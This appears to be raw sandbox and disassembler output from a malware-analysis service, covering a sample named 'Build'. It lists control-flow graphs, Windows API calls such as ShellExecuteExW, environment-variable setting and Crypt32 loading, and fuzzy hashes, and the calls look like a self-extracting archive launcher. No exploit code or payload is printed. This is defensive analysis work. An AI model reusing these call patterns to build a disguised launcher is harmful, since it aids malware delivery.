                                                                                                                                                                                control_flow_graph 868 b5fafc-b5fb2e call b61590 871 b5fb34-b5fb40 call b66433 868->871 872 b5fd7e-b5fd95 call b610f9 868->872 871->872 877 b5fb46-b5fb6e call b62640 871->877 880 b5fb70 877->880 881 b5fb78-b5fb89 877->881 880->881 882 b5fb94-b5fb9d 881->882 883 b5fb8b-b5fb92 881->883 884 b5fb9f-b5fba3 882->884 885 b5fbfa 882->885 883->884 887 b5fba6-b5fbac 884->887 886 b5fbfe-b5fc00 885->886 888 b5fc07-b5fc09 886->888 889 b5fc02-b5fc05 886->889 890 b5fbcd-b5fbda 887->890 891 b5fbae 887->891 895 b5fc1c-b5fc32 call b4d848 888->895 896 b5fc0b-b5fc12 888->896 889->888 889->895 893 b5fbe0-b5fbe4 890->893 894 b5fd53-b5fd55 890->894 892 b5fbb8-b5fbc2 891->892 897 b5fbc4 892->897 898 b5fbb0-b5fbb6 892->898 899 b5fd59-b5fd61 893->899 900 b5fbea-b5fbf4 893->900 894->899 906 b5fc34-b5fc41 call b54168 895->906 907 b5fc4b-b5fc56 call b4bccb 895->907 896->895 901 b5fc14 896->901 897->890 898->892 904 b5fbc6-b5fbc9 898->904 899->886 900->887 905 b5fbf6 900->905 901->895 904->890 905->885 906->907 912 b5fc43 906->912 913 b5fc73-b5fc80 ShellExecuteExW 907->913 914 b5fc58-b5fc6f call b4d563 907->914 912->907 913->872 916 b5fc86-b5fc8c 913->916 914->913 918 b5fc9f-b5fca1 916->918 919 b5fc8e-b5fc95 916->919 920 b5fca3-b5fcac 918->920 921 b5fcb8-b5fcd7 call b6004d 918->921 919->918 922 b5fc97-b5fc9d 919->922 920->921 929 b5fcae-b5fcb6 ShowWindow 920->929 923 b5fd0e-b5fd1a CloseHandle 921->923 939 b5fcd9-b5fce1 921->939 922->918 922->923 926 b5fd1c-b5fd29 call b54168 923->926 927 b5fd2b-b5fd39 923->927 926->927 937 b5fd66 926->937 930 b5fd6d-b5fd6f 927->930 931 b5fd3b-b5fd3d 927->931 929->921 930->872 936 b5fd71-b5fd73 930->936 931->930 934 b5fd3f-b5fd45 931->934 934->930 938 b5fd47-b5fd51 934->938 936->872 940 b5fd75-b5fd78 ShowWindow 936->940 937->930 938->930 939->923 941 b5fce3-b5fcf4 GetExitCodeProcess 939->941 940->872 941->923 942 b5fcf6-b5fd00 941->942 943 b5fd07 942->943 944 b5fd02 942->944 943->923 944->943
                                                                                                                                                                                APIs
                                                                                                                                                                                • _wcslen.LIBCMT ref: 00B5FB35
                                                                                                                                                                                • ShellExecuteExW.SHELL32(?), ref: 00B5FC78
                                                                                                                                                                                • ShowWindow.USER32(?,00000000,?,?,?,?,?,?,?,?,?,00000001,00000000), ref: 00B5FCB0
                                                                                                                                                                                • GetExitCodeProcess.KERNEL32(?,?), ref: 00B5FCEC
                                                                                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000001,00000000), ref: 00B5FD12
                                                                                                                                                                                • ShowWindow.USER32(?,00000001,?,?,?,?,?,?,?,?,?,00000001,00000000), ref: 00B5FD78
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true
                                                                                                                                                                                • Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_13_2_b40000_Build.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ShowWindow$CloseCodeExecuteExitHandleProcessShell_wcslen
                                                                                                                                                                                • String ID: .exe$.inf
                                                                                                                                                                                • API String ID: 36480843-3750412487
                                                                                                                                                                                • Opcode ID: 1b0f163b33e826e235af082e296a1a2402eb4bb53820bdfda2e6b0f7398737d5
                                                                                                                                                                                • Instruction ID: 25c7b40d03ff6715f266e5fc1c0cc58551e45668def5f638819901a9169ab724
                                                                                                                                                                                • Opcode Fuzzy Hash: 1b0f163b33e826e235af082e296a1a2402eb4bb53820bdfda2e6b0f7398737d5
                                                                                                                                                                                • Instruction Fuzzy Hash: 8B61C0315083869ADB309F60D841BBBFBE4EB85745F0448FEFDC497291EB7099898B52

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 945 b6cfab-b6cfc4 946 b6cfc6-b6cfd6 call b7159c 945->946 947 b6cfda-b6cfdf 945->947 946->947 955 b6cfd8 946->955 949 b6cfe1-b6cfe9 947->949 950 b6cfec-b6d010 MultiByteToWideChar 947->950 949->950 952 b6d016-b6d022 950->952 953 b6d1a3-b6d1b6 call b610f9 950->953 956 b6d076 952->956 957 b6d024-b6d035 952->957 955->947 961 b6d078-b6d07a 956->961 958 b6d037-b6d046 call b74660 957->958 959 b6d054-b6d065 call b6bc8e 957->959 965 b6d198 958->965 970 b6d04c-b6d052 958->970 959->965 971 b6d06b 959->971 964 b6d080-b6d093 MultiByteToWideChar 961->964 961->965 964->965 968 b6d099-b6d0ab call b6d5bc 964->968 969 b6d19a-b6d1a1 call b6d213 965->969 975 b6d0b0-b6d0b4 968->975 969->953 974 b6d071-b6d074 970->974 971->974 974->961 975->965 977 b6d0ba-b6d0c1 975->977 978 b6d0c3-b6d0c8 977->978 979 b6d0fb-b6d107 977->979 978->969 980 b6d0ce-b6d0d0 978->980 981 b6d153 979->981 982 b6d109-b6d11a 979->982 980->965 983 b6d0d6-b6d0f0 call b6d5bc 980->983 984 b6d155-b6d157 981->984 985 b6d135-b6d146 call b6bc8e 982->985 986 b6d11c-b6d12b call b74660 982->986 983->969 997 b6d0f6 983->997 988 b6d191-b6d197 call b6d213 984->988 989 b6d159-b6d172 call b6d5bc 984->989 985->988 1001 b6d148 985->1001 986->988 1000 b6d12d-b6d133 986->1000 988->965 989->988 1003 b6d174-b6d17b 989->1003 997->965 1002 b6d14e-b6d151 1000->1002 1001->1002 1002->984 1004 b6d1b7-b6d1bd 1003->1004 1005 b6d17d-b6d17e 1003->1005 1006 b6d17f-b6d18f WideCharToMultiByte 1004->1006 1005->1006 1006->988 1007 b6d1bf-b6d1c6 call b6d213 1006->1007 1007->969
                                                                                                                                                                                APIs
                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00B67F99,00B67F99,?,?,?,00B6D1FC,00000001,00000001,62E85006), ref: 00B6D005
                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00B6D1FC,00000001,00000001,62E85006,?,?,?), ref: 00B6D08B
                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,62E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00B6D185
                                                                                                                                                                                • __freea.LIBCMT ref: 00B6D192
                                                                                                                                                                                  • Part of subcall function 00B6BC8E: RtlAllocateHeap.NTDLL(00000000,?,?,?,00B66A24,?,0000015D,?,?,?,?,00B67F00,000000FF,00000000,?,?), ref: 00B6BCC0
                                                                                                                                                                                • __freea.LIBCMT ref: 00B6D19B
                                                                                                                                                                                • __freea.LIBCMT ref: 00B6D1C0
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true
                                                                                                                                                                                • Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_13_2_b40000_Build.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1414292761-0
                                                                                                                                                                                • Opcode ID: 5d852902262da769ee81947d6a542c8ac9e167768ca4c93f5e95e205dc89ef7f
                                                                                                                                                                                • Instruction ID: 5aed5f5ae83170a6f53bd6e7af31f17f4f2de6eb057411e832813b2213661cfe
                                                                                                                                                                                • Opcode Fuzzy Hash: 5d852902262da769ee81947d6a542c8ac9e167768ca4c93f5e95e205dc89ef7f
                                                                                                                                                                                • Instruction Fuzzy Hash: 6451C072B00216ABDB258F64CC81FBB77EAEB45710F1546A8FD19EA140DB78DC80C690

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 00B528AB: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00B528D4
                                                                                                                                                                                  • Part of subcall function 00B528AB: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00B51309,Crypt32.dll,00000000,00B51383,00000200,?,00B51366,00000000,00000000,?), ref: 00B528F4
                                                                                                                                                                                • OleInitialize.OLE32(00000000), ref: 00B5CCF2
                                                                                                                                                                                • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00B5CD29
                                                                                                                                                                                • SHGetMalloc.SHELL32(00B8C460), ref: 00B5CD33
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true
                                                                                                                                                                                • Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_13_2_b40000_Build.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
                                                                                                                                                                                • String ID: riched20.dll$3To
                                                                                                                                                                                • API String ID: 3498096277-2168385784
                                                                                                                                                                                • Opcode ID: a07c5829acc72e2c3eb77ff61bbb895dba290f2f664fa2ae989c2be74b423207
                                                                                                                                                                                • Instruction ID: 15059de5d28a6cdbc184e3f0943822e51b0b0682493178e31fc030e4e407a11d
                                                                                                                                                                                • Opcode Fuzzy Hash: a07c5829acc72e2c3eb77ff61bbb895dba290f2f664fa2ae989c2be74b423207
                                                                                                                                                                                • Instruction Fuzzy Hash: 40F049B1D44209ABDB20AF99DC499EFFFFCEF81700F00409AE811A2251CBB846458BA0

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 1014 b512f6-b512fd 1015 b51332-b51333 1014->1015 1016 b512ff-b5130d call b528ab 1014->1016 1019 b5130f-b5132b GetProcAddress * 2 1016->1019 1020 b5132e 1016->1020 1019->1020 1020->1015
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 00B528AB: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00B528D4
                                                                                                                                                                                  • Part of subcall function 00B528AB: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00B51309,Crypt32.dll,00000000,00B51383,00000200,?,00B51366,00000000,00000000,?), ref: 00B528F4
                                                                                                                                                                                • GetProcAddress.KERNELBASE(00000000,CryptProtectMemory), ref: 00B51315
                                                                                                                                                                                • GetProcAddress.KERNEL32(00B8C1F0,CryptUnprotectMemory), ref: 00B51325
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true
                                                                                                                                                                                • Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_13_2_b40000_Build.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AddressProc$DirectoryLibraryLoadSystem
                                                                                                                                                                                • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                                                                                                                                                                                • API String ID: 2141747552-1753850145
                                                                                                                                                                                • Opcode ID: 520052b447231495bdb7801a2310dc854e5f7ca18cba2ecc931673954037c906
                                                                                                                                                                                • Instruction ID: c260b6dabd33d40dbf76326fd8a430aff3a52d07ca9041bf4054ea35278a48de
                                                                                                                                                                                • Opcode Fuzzy Hash: 520052b447231495bdb7801a2310dc854e5f7ca18cba2ecc931673954037c906
                                                                                                                                                                                • Instruction Fuzzy Hash: 04E08670A51F01AED7305F7899497427FE49F24711F04CCEDE4ED93550DAB4D4888B10

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 1021 b4b2b0-b4b2ea call b61590 1024 b4b2f5 1021->1024 1025 b4b2ec-b4b2ef 1021->1025 1027 b4b2f7-b4b308 1024->1027 1025->1024 1026 b4b2f1-b4b2f3 1025->1026 1026->1027 1028 b4b310-b4b31a 1027->1028 1029 b4b30a 1027->1029 1030 b4b31c 1028->1030 1031 b4b31f-b4b32c call b47eed 1028->1031 1029->1028 1030->1031 1034 b4b334-b4b34d CreateFileW 1031->1034 1035 b4b32e 1031->1035 1036 b4b34f-b4b36e GetLastError call b4da1e 1034->1036 1037 b4b39b-b4b39f 1034->1037 1035->1034 1040 b4b3a8-b4b3ad 1036->1040 1046 b4b370-b4b393 CreateFileW GetLastError 1036->1046 1038 b4b3a3-b4b3a6 1037->1038 1038->1040 1041 b4b3b9-b4b3be 1038->1041 1040->1041 1043 b4b3af 1040->1043 1044 b4b3c0-b4b3c3 1041->1044 1045 b4b3df-b4b3f0 1041->1045 1043->1041 1044->1045 1047 b4b3c5-b4b3d9 SetFileTime 1044->1047 1048 b4b3f2-b4b407 call b5268b 1045->1048 1049 b4b40b-b4b424 call b610f9 1045->1049 1046->1038 1050 b4b395-b4b399 1046->1050 1047->1045 1048->1049 1050->1038
                                                                                                                                                                                APIs
                                                                                                                                                                                • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,08000000,00000000,?,00000000,?,?,00B48846,?,00000005), ref: 00B4B342
                                                                                                                                                                                • GetLastError.KERNEL32(?,?,00B48846,?,00000005), ref: 00B4B34F
                                                                                                                                                                                • CreateFileW.KERNEL32(?,?,?,00000000,00000003,08000000,00000000,?,?,00000800,?,?,00B48846,?,00000005), ref: 00B4B382
                                                                                                                                                                                • GetLastError.KERNEL32(?,?,00B48846,?,00000005), ref: 00B4B38A
                                                                                                                                                                                • SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,00B48846,?,00000005), ref: 00B4B3D9
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true
                                                                                                                                                                                • Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_13_2_b40000_Build.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: File$CreateErrorLast$Time
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1999340476-0
                                                                                                                                                                                • Opcode ID: fe9e4431cde2678b2374546f8dc67ac66684251be6b35bc486bbc2ff706f2e45
                                                                                                                                                                                • Instruction ID: 55cd6f3521155bd3333a1209f5e53ec04bced951641468f53471f6043ea0e432
                                                                                                                                                                                • Opcode Fuzzy Hash: fe9e4431cde2678b2374546f8dc67ac66684251be6b35bc486bbc2ff706f2e45
                                                                                                                                                                                • Instruction Fuzzy Hash: A8414670948745AFD320DF25CC85FAABBD8FB44320F100A59FAA5972C1D7B0EA48DB95

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 1084 b5d864-b5d87d PeekMessageW 1085 b5d87f-b5d893 GetMessageW 1084->1085 1086 b5d8b8-b5d8ba 1084->1086 1087 b5d895-b5d8a2 IsDialogMessageW 1085->1087 1088 b5d8a4-b5d8b2 TranslateMessage DispatchMessageW 1085->1088 1087->1086 1087->1088 1088->1086
                                                                                                                                                                                APIs
                                                                                                                                                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00B5D875
                                                                                                                                                                                • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00B5D886
                                                                                                                                                                                • IsDialogMessageW.USER32(0002043C,?), ref: 00B5D89A
                                                                                                                                                                                • TranslateMessage.USER32(?), ref: 00B5D8A8
                                                                                                                                                                                • DispatchMessageW.USER32(?), ref: 00B5D8B2
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true
                                                                                                                                                                                • Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_13_2_b40000_Build.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Message$DialogDispatchPeekTranslate
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1266772231-0
                                                                                                                                                                                • Opcode ID: f976606015c3336dbfa6dc9308f385c0c92066b16819a9df77fcbbbc6aef7e63
                                                                                                                                                                                • Instruction ID: 3e7fd4c9e48fa6801afd3f7154145248873234aff8c3b296105f3bf8ef1d8030
                                                                                                                                                                                • Opcode Fuzzy Hash: f976606015c3336dbfa6dc9308f385c0c92066b16819a9df77fcbbbc6aef7e63
                                                                                                                                                                                • Instruction Fuzzy Hash: ACF03071905219ABDB30ABE5DC0DEDB7FBCEE062517004150B906D3010EF34D509C7B0

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 1089 b5cb49-b5cb72 GetClassNameW 1090 b5cb74-b5cb89 call b54168 1089->1090 1091 b5cb9a-b5cb9c 1089->1091 1097 b5cb99 1090->1097 1098 b5cb8b-b5cb97 FindWindowExW 1090->1098 1093 b5cba7-b5cbb3 call b610f9 1091->1093 1094 b5cb9e-b5cba1 SHAutoComplete 1091->1094 1094->1093 1097->1091 1098->1097
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetClassNameW.USER32(?,?,00000050), ref: 00B5CB6A
                                                                                                                                                                                • SHAutoComplete.SHLWAPI(?,00000010), ref: 00B5CBA1
                                                                                                                                                                                  • Part of subcall function 00B54168: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,000000FF,00B4E084,00000000,.exe,?,?,00000800,?,?,?,00B5AD5D), ref: 00B5417E
                                                                                                                                                                                • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 00B5CB91
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true
                                                                                                                                                                                • Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_13_2_b40000_Build.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AutoClassCompareCompleteFindNameStringWindow
                                                                                                                                                                                • String ID: EDIT
                                                                                                                                                                                • API String ID: 4243998846-3080729518
                                                                                                                                                                                • Opcode ID: 2890ec7eedac3065c665bfd47630b12a82309d352aefd7b7a79a7d2d610e31f7
                                                                                                                                                                                • Instruction ID: 8f0e21512c078b01d4799fe5de11e9a5be7002d1b8b55bbc882f7c6404570c58
                                                                                                                                                                                • Opcode Fuzzy Hash: 2890ec7eedac3065c665bfd47630b12a82309d352aefd7b7a79a7d2d610e31f7
                                                                                                                                                                                • Instruction Fuzzy Hash: 44F0A432A45318BFDB209B258C07F9F7BECDF86701F010095BD05B7180DE709D058AA5

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 1100 b5ffdd-b60011 call b61590 SetEnvironmentVariableW call b523d6 1104 b60016-b6001a 1100->1104 1105 b6003e-b6004a call b610f9 1104->1105 1106 b6001c-b60020 1104->1106 1107 b60029-b60030 call b524f2 1106->1107 1112 b60022-b60028 1107->1112 1113 b60032-b60038 SetEnvironmentVariableW 1107->1113 1112->1107 1113->1105
                                                                                                                                                                                APIs
                                                                                                                                                                                • SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 00B5FFFE
                                                                                                                                                                                • SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00B60038
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true
                                                                                                                                                                                • Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_13_2_b40000_Build.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: EnvironmentVariable
                                                                                                                                                                                • String ID: sfxcmd$sfxpar
                                                                                                                                                                                • API String ID: 1431749950-3493335439
                                                                                                                                                                                • Opcode ID: 02760a6316df08999891ac0bd2517a91d0b7373b40228378cd2de02efce103c2
                                                                                                                                                                                • Instruction ID: 2d3fe8f060de537499e2db75cd1585f3d1b2fede7c42c4af2f5825304e00c4e2
                                                                                                                                                                                • Opcode Fuzzy Hash: 02760a6316df08999891ac0bd2517a91d0b7373b40228378cd2de02efce103c2
                                                                                                                                                                                • Instruction Fuzzy Hash: C3F0F671911228ABD720AF958C09AAFB3DCEF1DB4174044D6BD46A7281DEB89D80CBA5

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 1114 b66232-b66247 LoadLibraryExW 1115 b6627b-b6627c 1114->1115 1116 b66249-b66252 GetLastError 1114->1116 1117 b66254-b66268 call b688f8 1116->1117 1118 b66279 1116->1118 1117->1118 1121 b6626a-b66278 LoadLibraryExW 1117->1121 1118->1115
                                                                                                                                                                                APIs
                                                                                                                                                                                • LoadLibraryExW.KERNELBASE(00000011,00000000,00000800,?,00B661E3,00000000,00000001,00BA60C8,?,?,?,00B66386,00000004,InitializeCriticalSectionEx,00B79624,InitializeCriticalSectionEx), ref: 00B6623F
                                                                                                                                                                                • GetLastError.KERNEL32(?,00B661E3,00000000,00000001,00BA60C8,?,?,?,00B66386,00000004,InitializeCriticalSectionEx,00B79624,InitializeCriticalSectionEx,00000000,?,00B6613D), ref: 00B66249
                                                                                                                                                                                • LoadLibraryExW.KERNEL32(00000011,00000000,00000000,?,00000011,00B65083), ref: 00B66271
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true
